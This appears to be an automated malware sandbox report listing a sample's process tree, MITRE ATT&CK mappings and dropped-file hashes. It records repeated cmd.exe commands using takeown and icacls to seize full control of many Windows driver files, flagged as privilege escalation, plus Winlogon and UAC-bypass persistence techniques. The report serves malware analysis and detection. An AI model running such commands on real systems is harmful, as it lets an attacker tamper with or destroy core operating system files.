C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:5020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:4204
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\udfs.sys /grant "Admin:F"3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:4752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:4392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:4976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umbus.sys /grant "Admin:F"3⤵PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:3444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umpass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:4216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵
- Possible privilege escalation attempt
PID:3452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usb8023.sys /grant "Admin:F"3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:3428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵
- Modifies file permissions
PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:4460
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbccgp.sys /grant "Admin:F"3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:4264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:4756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:5000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:4992
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "666553407-2422271071440901352518037052-2141748745-522475677-19508463651134594234"1⤵PID:2684
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1857899218-1560305888292797261-973535272-2141762495-976787630-995740567574803656"1⤵PID:2680
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1122199040-1714473253-6982048164051347578279849026270384887940930991690827210"1⤵PID:2132
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1142349054193998270-4376408322126249794-21075152341801744279364151453-1508406435"1⤵PID:2104
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "58918096612940820291210510747981798257-1623490249-403905952-132946968972695468"1⤵PID:2472
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "181547942145088162-1378572561-62364378421351882091210538253-796265935-1525391288"1⤵PID:2272
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4320833181942980929-1956925131212349001920187850-15116099464401488751355876890"1⤵PID:2480
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1920746531-64127857612429799901166786120-1167891504-57243096820643700871522377342"1⤵PID:3080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3851295451085023222-49118410-80606526393047973-1948715543-1316971505-1514205931"1⤵PID:3240
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "791483365650075742-2141357394-1938479178-1030364850-305016780-13330945831296903710"1⤵PID:3764
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19057771901086172174425028665-1512937910593990518-118355082417153801901727868614"1⤵PID:2272
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1508030809-1666408161980747996-654105463-18330992091687735845226571197153685715"1⤵PID:3824
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21079505831468012149-528521608-54491765720108574901560526527-1476080363-40170271"1⤵PID:3588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1129626361-1431669524459659054462678251-711793461148555146-15445423641142995978"1⤵PID:3624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-76288665615261338061371076977662147246-10684951251396307912-67375366-1041245914"1⤵PID:3668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "57622938220461837059858588151405591021-60575046-1335643898839262876177357112"1⤵PID:3508
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "937289004209287889020506465381855621753-249693099-775495679508299926-205205035"1⤵PID:3276
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "123878135518568282514484283981726139469-898391805-6996257252085277726-705776365"1⤵PID:3900
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-507257125936842317-708959292-1486256913925326347-928996548-1471415050-61980815"1⤵PID:4104
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "299750112567717925537317446-2701742491739786731-944788160142238702-1848904695"1⤵PID:4076
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "138940903118434457892044297336590645185-13323534821761808338-154971858678053993"1⤵PID:3296
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "519298200-9503947269868885542099136202518254041-1838982058-12358455941789867121"1⤵PID:592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "141613501-5093261101947822003-540648113-2043727716274538102943939993-1415160023"1⤵PID:3160
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9001074441218173475-1962976404-77386517-208755407783214961-9172194951994295676"1⤵PID:5060
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11544565721734145971-19077135641114810090499061891834485510-1125949751-930077534"1⤵PID:4852
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12406514371204475962145167884-1804359337-1993179521759341161858387789-924677391"1⤵PID:4432
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "504932160-37616093-1457095057-2143970331-1334395421-1804905721848453421-1304212327"1⤵PID:4684
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\±╩σ█±♣77╔öïž╚₧•6♥å↕½²¾7○«↕╧č╩í╔ñå♫▀Â↕σø╧♣ó◘∩╠∩ě♪4±█σ♣☼▌µσ¤♠╔øÿ♣¶≈43ä▀5↑ÿ∩Æ╥£╤9√®ß╚ß∞╬6£®♣♫ε↑Æ╩Â▄♠↕♀▌
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize
103KB
MD5373d53d7c6709d5106b29a26a71b0d31
SHA11708009c111266ba513503e06b94a5ccd402dee5
SHA256de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA51215b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d